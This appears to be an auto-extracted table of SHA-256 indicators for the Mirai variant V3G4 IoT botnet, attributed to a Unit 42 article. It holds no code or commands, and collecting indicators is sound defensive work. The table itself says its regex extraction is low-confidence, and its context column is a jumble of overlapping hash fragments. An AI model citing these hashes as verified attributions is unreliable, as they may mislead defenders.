| sha256 | 63acd589a53bdec49c624f3cb2fc8319218df721f486e2f15f3c07abed97aae6 | b3b7cb2d57ca1e89999b0b1da80fb9658dff6e44 December Campaign: 63ACD589A53BDEC49C624F3CB2FC8319218DF721F486E2F15F3C07ABED97AAE6 1cf3879d9e93d1ff30ce5ec0f64ff15b1db7d8237160c83efed688d800e | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 64545e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdbd4fd1 | 9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03 64545e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdbd4fd1 69bb44736817dabe88e3014c6207ba702f644fb43f6feaec23091af0b52 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 67379740ed15e8da8604cc1f0ea715c8641674de66e553c461b3ae782a5d0cbe | 70e16d65f5f4b21777b87c9aae6072022c3dfbefd177f37c8aef4a6aeee 67379740ed15e8da8604cc1f0ea715c8641674de66e553c461b3ae782a5d0cbe ab3d61a76197003822252124e89987d061d6a4a33b9891cea778d3708cd | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 69bb44736817dabe88e3014c6207ba702f644fb43f6feaec23091af0b5224bc6 | e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdbd4fd1 69bb44736817dabe88e3014c6207ba702f644fb43f6feaec23091af0b5224bc6 eaa387fcc12f2d8a7d42f12d27e7dccb4f3e11492a7d3a3a1ce830a11b5 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 6f654198e8efd5aff1c7a903353967d0e96aeff0402cb0a79fabbc10d18c63d2 | 1a76197003822252124e89987d061d6a4a33b9891cea778d3708cd50447 6f654198e8efd5aff1c7a903353967d0e96aeff0402cb0a79fabbc10d18c63d2 c288c200cf7bbebe7a81fd42ca1bd4c6cb6080f28f2cec297a0d3e6aff7 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 73cc00acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5b7aec | f1ffd2ec66a5076a7fea5d83caa8bbcdb0f3bc3bd030c77eded6f4b5d90 73cc00acc478bf09658a679a4689f34598fe6e92086efe82900242f3cc5b7aec 1218da43a62da76927484bca73a3eee53425c54625147f8d01149bcef2f | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 7bc99c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733 | 420a978434e2b6a9e9b85b688a44593fa V3G4 Sample July Campaign 7bc99c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733 88f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef8 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 7d9cdf3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2cd9ec2 | 6cabbb90dfe9cd75f12c01fb64766dd1ec0f4247dbf8f4477dd64407fbf 7d9cdf3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2cd9ec2 9a0d39265b53e1959df49dbc8727ad344abc12a8bc0bd8d8b76f8b15052 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 7dea8dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13bae2c | 0391279b014e53d73c2216a84bd528e18f1f633ba0101288aa963f77c5b 7dea8dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13bae2c a10ce475f64f3821ab32c88f6b013effd40843dd575ceaab46a57f134c2 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 88f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03 | c87a1e0582b5f15f40141226862fbe726b496e1e77c7f95993e8e945733 88f7b9a8c4f9bb28582c485549b328d6123e8aea33009ce7657f7fc0ef829e03 64545e94daafba191669333e1dd0c6e1190df47e0742bd515911cce0cdb | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 916e00391279b014e53d73c2216a84bd528e18f1f633ba0101288aa963f77c5b | 934f6f72941b9a60097ab09228d873a2f8737ee0ea93b08e5f1cc3916d1 916e00391279b014e53d73c2216a84bd528e18f1f633ba0101288aa963f77c5b 7dea8dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 9a0d39265b53e1959df49dbc8727ad344abc12a8bc0bd8d8b76f8b150525dca6 | f3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2cd9ec2 9a0d39265b53e1959df49dbc8727ad344abc12a8bc0bd8d8b76f8b150525dca6 d00fbfc439cb9c5c850690134b0d51f262021c0d04d9934df464980c346 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | 9b7f36cabbb90dfe9cd75f12c01fb64766dd1ec0f4247dbf8f4477dd64407fbf | 0880e2b5a8a8d43a5f1fd6f5d36fc665ab9b4031a9b6a4d52222004c2c1 9b7f36cabbb90dfe9cd75f12c01fb64766dd1ec0f4247dbf8f4477dd64407fbf 7d9cdf3afb1d52f49d82b1ffe28a3da08c6aeeaa8c5047ba37c73802d2c | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
| sha256 | a10ce475f64f3821ab32c88f6b013effd40843dd575ceaab46a57f134c2478b6 | dac3f455f3a57fecfa5a047439126556858c239e73cd8feec2dc13bae2c a10ce475f64f3821ab32c88f6b013effd40843dd575ceaab46a57f134c2478b6 d9b5199f36fc416d8a87d798926e0d9dcbb2fe97610cf08d6887dae1355 | Mirai Variant V3G4 Targets IoT Devices Palo Alto Unit 42 | · Aug 17, 2026 |
Extraction is regex-based (SHA-256/SHA-1/MD5, public IPv4, defanged hxxp/[.] indicators, and bare domains/emails only from malware, actor, exploit, phishing, ransomware and breach articles with a nearby indicator context word). Treat confidence as low until you verify against the source article.